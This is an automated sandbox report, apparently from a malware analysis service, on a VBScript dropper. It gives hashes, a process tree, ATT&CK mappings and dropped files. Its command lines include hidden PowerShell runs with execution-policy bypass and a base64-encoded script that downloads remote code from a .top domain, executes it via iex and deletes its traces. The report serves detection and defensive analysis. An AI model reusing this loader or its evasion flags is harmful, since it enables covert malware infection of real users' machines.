e865a8cc36db489adacecd0932e4b07d9320402532c5e15918c377bbda156c37

General

Target

e865a8cc36db489adacecd0932e4b07d9320402532c5e15918c377bbda156c37.vbs
Size

79KB
MD5

af1d73edd871bf6f26fa1561a95a0175
SHA1

235b37402a70e5c7626f6a73d33a7483c628c0ee
SHA256

e865a8cc36db489adacecd0932e4b07d9320402532c5e15918c377bbda156c37
SHA512

8c9bb59ceb94b7c10e4cd7741e5a0ce1d6206b0999a3cdd5befc364e25e38eb3497d930ab64e1f0c8b9b8103bfca195a9489cc331e165c10efddba1d17702c81
SSDEEP

768:vilsosMils8ZiBiMils4iBi5ilsMilsJiBiMilsJiBiwils2CBz/W3WFsMilsJiX:jCBz/09

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2552	powershell.exe
2388	powershell.exe
484	powershell.exe
2152	powershell.exe
2304	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2552	powershell.exe
2388	powershell.exe
484	powershell.exe
2152	powershell.exe
2304	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	484	powershell.exe
Token: SeDebugPrivilege	2152	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2728 wrote to memory of 2552	2728	WScript.exe	30
PID 2728 wrote to memory of 2552	2728	WScript.exe	30
PID 2728 wrote to memory of 2552	2728	WScript.exe	30
PID 2552 wrote to memory of 3068	2552	powershell.exe	32
PID 2552 wrote to memory of 3068	2552	powershell.exe	32
PID 2552 wrote to memory of 3068	2552	powershell.exe	32
PID 3068 wrote to memory of 2388	3068	cmd.exe	33
PID 3068 wrote to memory of 2388	3068	cmd.exe	33
PID 3068 wrote to memory of 2388	3068	cmd.exe	33
PID 2388 wrote to memory of 484	2388	powershell.exe	34
PID 2388 wrote to memory of 484	2388	powershell.exe	34
PID 2388 wrote to memory of 484	2388	powershell.exe	34
PID 484 wrote to memory of 2152	484	powershell.exe	36
PID 484 wrote to memory of 2152	484	powershell.exe	36
PID 484 wrote to memory of 2152	484	powershell.exe	36
PID 2152 wrote to memory of 2304	2152	powershell.exe	37
PID 2152 wrote to memory of 2304	2152	powershell.exe	37
PID 2152 wrote to memory of 2304	2152	powershell.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e865a8cc36db489adacecd0932e4b07d9320402532c5e15918c377bbda156c37.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\Admin\AppData\Roaming\dahcJGsr.bat"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /q /cC:\Users\Admin\AppData\Roaming\dahcJGsr.bat
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3068
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\Admin\AppData\Roaming\dahcJGsr.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2388
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR1WGxJMVpzTzg2WmJESU5EQ3BuWXRrUWtjTjVsMXZMOXkzTDBLMDdaeHJZakpzbCA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokT29rN1RNMzZ5NllqID0gW2ludF0oR2V0LURhdGUgLUZvcm1hdCBISCk7CiRTVXlEVG5HNW1oQTZ2cXRFMnlGSjU0ID0gW2ludF0oR2V0LURhdGUgLUZvcm1hdCBtbSk7CiRTVXlEVG5HNW1oQTZ2cXRFMnlGSjU0QWRkID0gMzsKSWYgKCRTVXlEVG5HNW1oQTZ2cXRFMnlGSjU0ICsgJFNVeURUbkc1bWhBNnZxdEUyeUZKNTRBZGQgLWd0IDU5KSB7CiAgICAkT29rN1RNMzZ5NllqID0gJE9vazdUTTM2eTZZaiArIDE7CiAgICAkU1V5RFRuRzVtaEE2dnF0RTJ5Rko1NCA9ICRTVXlEVG5HNW1oQTZ2cXRFMnlGSjU0ICsgJFNVeURUbkc1bWhBNnZxdEUyeUZKNTRBZGQgLSA2MDsKfSBFbHNlIHsKICAgICRTVXlEVG5HNW1oQTZ2cXRFMnlGSjU0ID0gJFNVeURUbkc1bWhBNnZxdEUyeUZKNTQgKyAkU1V5RFRuRzVtaEE2dnF0RTJ5Rko1NEFkZDsKfTsKJE9vazdUTTM2eTZZaiA9IElmIChbaW50XShHZXQtRGF0ZSAtRm9ybWF0IEhIKSArIDEgLWd0IDIzKSB7IjAwIn0gRWxzZSB7JE9vazdUTTM2eTZZan07CiRVaEs3a29ibFowOW8wMmFiRnRQTTN4aERhZ2pCSGxmaHI3VzU5bm5FdXNKbTN5d3VuNEVGYnkwOXJPeWliTUxYID0gJCgtam9pbiAoKDY1Li45MCkgKyAoOTcuLjEyMikgfCBHZXQtUmFuZG9tIC1Db3VudCAxMiB8ICUge1tjaGFyXSRffSkpOwokVWh1b3liV1V6RVJvdDF2R0o5MUFkRFhmcmV0UjBmTndpcE5uRXZTM3FvVG51NkRqU0p1dzRPQ1Q3bk1iY3ZqaGtsRVpDUVhoM1hyWVhESzVyID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJFVoSzdrb2JsWjA5bzAyYWJGdFBNM3hoRGFnakJIbGZocjdXNTlubkV1c0ptM3l3dW40RUZieTA5ck95aWJNTFgpLnBzMSIgLUZvcmNlIAoiQDsKCiJwb3dlcnNoZWxsIC1ub3Byb2ZpbGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLVdpbmRvd1N0eWxlIGhpZGRlbiAtYyAkKCRVaHVveWJXVXpFUm90MXZHSjkxQWREWGZyZXRSMGZOd2lwTm5FdlMzcW9UbnU2RGpTSnV3NE9DVDduTWJjdmpoa2xFWkNRWGgzWHJZWERLNXIpIiB8IE91dC1GaWxlIC1GaWxlUGF0aCAiQzpcVXNlcnNcUHVibGljXERvY3VtZW50c1wkKCRVaEs3a29ibFowOW8wMmFiRnRQTTN4aERhZ2pCSGxmaHI3VzU5bm5FdXNKbTN5d3VuNEVGYnkwOXJPeWliTUxYKS5wczEiOwpwb3dlcnNoZWxsIC1ub3Byb2ZpbGUgLWV4ZWN1dGlvbnBvbGljeSBieXBhc3MgLVdpbmRvd1N0eWxlIGhpZGRlbiAtRmlsZSBDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJFVoSzdrb2JsWjA5bzAyYWJGdFBNM3hoRGFnakJIbGZocjdXNTlubkV1c0ptM3l3dW40RUZieTA5ck95aWJNTFgpLnBzMQpSZW1vdmUtSXRlbSAiJGVudjpBUFBEQVRBXCoucHMxIiAtRm9yY2UKUmVtb3ZlLUl0ZW0gIiRlbnY6QVBQREFUQVwqLmJhdCIgLUZvcmNlCg==')) | iex"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:484
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\TwbRBIgqJaxG.ps1
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
349ac671c03db7c8d972fafda1987373

SHA1
7d333d0facc4639c7c4cf89f05f3d79701b7a6ca

SHA256
eeb8f01b525a30cde1e621035aa2a7773ecb2a5990e54fbe5c2b17d574f65d76

SHA512
d91acbdf4711fcbe0934b615f257a2812d1d0ddba648cd0bd188bda4a041f7a2a73cd4bdce3938020ab78609b9143050d5eae778b5aa45f1f3c5ef6ace60624f

Download Submit
C:\Users\Admin\AppData\Roaming\dahcJGsr.bat

Filesize
127B

MD5
60fe766931fd35ab7ef71a58d050d151

SHA1
093d3e8ad6589650791b076c293d83fd68a01258

SHA256
a2655f4b7688d460aeead5969d386c9b233dd967d74a4b965ae881804ed63df6

SHA512
5b6d1457f7ffa926c9a6ac1c70672611d076ca417c2879dc72d3d6b4f492d23cfc49d34d8cddebd8a2f863bedca2059ae679a9a31e418c3cab0952863fe972b4

Download Submit
C:\Users\Admin\AppData\Roaming\dahcJGsr.ps1

Filesize
2KB

MD5
674e9e7128df273743b820de0f086f39

SHA1
6ea3b3dd589f01aede4f2fc8cfea1025bb082c9c

SHA256
9679e36b28e3d3d0452f1d41855ea65d7256701555624870ce6a4ad53d904be1

SHA512
eb0a22da8ab8d981c92c98a1e7ad76f10974ccdf09c50d0f5c1f1df9e701e546b8e853754dde7a6c6f96e05255c1cc16558844946aa5d3e054ac5035ad9d20b2

Download Submit
C:\Users\Public\Documents\TwbRBIgqJaxG.ps1

Filesize
438B

MD5
6da9ad974e710023c85f2ac108037726

SHA1
1397df750430236f9d2c7ac1a4328a2e799930ed

SHA256
3a98d1ec005216bb26b6431595ddd8a3716fc812bf7966e94371ac1371926bc0

SHA512
b0f3a336a5d78f9ca4bc17c07de0511fe730b9c79b23bfa84ac6418f046111dc88fda04beaf5fc1c97ce59c5c6bb0d7223f0a965d4a8ddf89fe9d122d7a5a31e

Download Submit
memory/2552-7-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/2552-11-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-12-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-10-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-14-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-6-0x000007FEF62FE000-0x000007FEF62FF000-memory.dmp

Filesize
4KB

Download
memory/2552-9-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-8-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2552-38-0x000007FEF6040000-0x000007FEF69DD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing